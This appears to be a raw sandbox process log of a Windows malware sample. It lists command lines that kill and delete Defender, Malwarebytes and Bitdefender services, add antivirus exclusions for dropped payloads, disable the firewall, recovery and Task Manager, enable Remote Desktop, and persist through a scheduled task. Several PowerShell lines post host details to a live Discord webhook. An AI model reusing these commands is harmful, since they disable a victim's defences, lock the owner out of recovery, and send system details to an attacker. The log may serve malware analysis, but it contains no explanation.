netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
C:\Windows\system32\ReAgentc.exe
reagentc /disable
C:\Windows\system32\ReAgentc.exe
reagentc /disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Invoke-WebRequest -Uri 'https://api64.ipify.org').Content"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery /a /r /d y
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled No
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Invoke-WebRequest -Uri 'https://api64.ipify.org').Content"
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue {default} recoveryenabled
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\net.exe
net stop "SDRSVC"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Windows\system32\net.exe
net stop "security center"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue {default} recoveryenabled
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\net.exe
net stop "wuauserv"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"
C:\Windows\system32\net.exe
net stop "SDRSVC"
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Windows\system32\net.exe
net stop sharedaccess
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
C:\Windows\system32\net.exe
net stop "security center"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
C:\Windows\system32\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableAntiTamper $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"
C:\Windows\system32\net.exe
net stop "wuauserv"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\net.exe
net stop sharedaccess
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\system32\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableAntiTamper $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbam.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MBAMService.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamtray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamscheduler.exe /T
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\sc.exe
sc stop MBAMProtector
C:\Windows\system32\sc.exe
sc delete MBAMProtector
C:\Windows\system32\sc.exe
sc stop MBAMChameleon
C:\Windows\system32\sc.exe
sc delete MBAMChameleon
C:\Windows\system32\sc.exe
sc stop MBAMFarflt
C:\Windows\system32\sc.exe
sc delete MBAMFarflt
C:\Windows\system32\sc.exe
sc stop MBAMSwissArmy
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
C:\Windows\system32\sc.exe
sc delete MBAMSwissArmy
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbam.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM MBAMService.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdservicehost.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamtray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdagent.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdredline.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamscheduler.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdparentalservice.exe /T
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\sc.exe
sc stop MBAMProtector
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdreinit.exe /T
C:\Windows\system32\sc.exe
sc delete MBAMProtector
C:\Windows\system32\sc.exe
sc stop MBAMChameleon
C:\Windows\system32\sc.exe
sc delete MBAMChameleon
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdsubwiz.exe /T
C:\Windows\system32\sc.exe
sc stop MBAMFarflt
C:\Windows\system32\sc.exe
sc delete MBAMFarflt
C:\Windows\system32\sc.exe
sc stop MBAMSwissArmy
C:\Windows\system32\taskkill.exe
taskkill /F /IM seccenter.exe /T
C:\Windows\system32\sc.exe
sc delete MBAMSwissArmy
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM vsserv.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM epssecurityservice.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdservicehost.exe /T
C:\Windows\system32\sc.exe
sc stop bdservicehost
C:\Windows\system32\sc.exe
sc delete bdservicehost
C:\Windows\system32\sc.exe
sc stop bdagent
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdagent.exe /T
C:\Windows\system32\sc.exe
sc delete bdagent
C:\Windows\system32\sc.exe
sc stop bdredline
C:\Windows\system32\sc.exe
sc delete bdredline
C:\Windows\system32\sc.exe
sc stop bdparentalservice
C:\Windows\system32\sc.exe
sc delete bdparentalservice
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdredline.exe /T
C:\Windows\system32\sc.exe
sc stop bdreinit
C:\Windows\system32\sc.exe
sc delete bdreinit
C:\Windows\system32\sc.exe
sc stop bdsubwiz
C:\Windows\system32\sc.exe
sc delete bdsubwiz
C:\Windows\system32\sc.exe
sc stop seccenter
C:\Windows\system32\sc.exe
sc delete seccenter
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdparentalservice.exe /T
C:\Windows\system32\sc.exe
sc stop vsserv
C:\Windows\system32\sc.exe
sc delete vsserv
C:\Windows\system32\sc.exe
sc stop epssecurityservice
C:\Windows\system32\sc.exe
sc delete epssecurityservice
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdreinit.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdsubwiz.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM seccenter.exe /T
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\taskkill.exe
taskkill /F /IM vsserv.exe /T
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\taskkill.exe
taskkill /F /IM MsMpEng.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM epssecurityservice.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MpCmdRun.exe /T
C:\Windows\system32\sc.exe
sc stop bdservicehost
C:\Windows\system32\sc.exe
sc delete bdservicehost
C:\Windows\system32\sc.exe
sc stop bdagent
C:\Windows\system32\taskkill.exe
taskkill /F /IM SecurityHealthSystray.exe /T
C:\Windows\system32\sc.exe
sc delete bdagent
C:\Windows\system32\sc.exe
sc stop bdredline
C:\Windows\system32\sc.exe
sc delete bdredline
C:\Windows\system32\taskkill.exe
taskkill /F /IM smartscreen.exe /T
C:\Windows\system32\sc.exe
sc stop bdparentalservice
C:\Windows\system32\sc.exe
sc delete bdparentalservice
C:\Windows\system32\sc.exe
sc stop bdreinit
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\system32\sc.exe
sc delete bdreinit
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\sc.exe
sc stop bdsubwiz
C:\Windows\system32\sc.exe
sc delete bdsubwiz
C:\Windows\system32\sc.exe
sc stop seccenter
C:\Windows\system32\sc.exe
sc delete seccenter
C:\Windows\system32\sc.exe
sc stop vsserv
C:\Windows\system32\sc.exe
sc delete vsserv
C:\Windows\system32\sc.exe
sc stop epssecurityservice
C:\Windows\system32\sc.exe
sc delete epssecurityservice
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Defender" /r /d y
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\notepad.exe /a /r /d y
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\calc.exe /a /r /d y
C:\Windows\system32\taskkill.exe
taskkill /F /IM MsMpEng.exe /T
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\taskkill.exe
taskkill /F /IM MpCmdRun.exe /T
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\taskkill.exe
taskkill /F /IM SecurityHealthSystray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM smartscreen.exe /T
C:\Windows\system32\powercfg.exe
powercfg /hibernate off REM Disables hibernation
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
